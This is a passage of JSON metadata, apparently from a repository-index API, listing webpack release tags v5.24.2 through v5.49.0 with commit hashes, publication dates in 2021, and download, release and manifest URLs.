ependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manife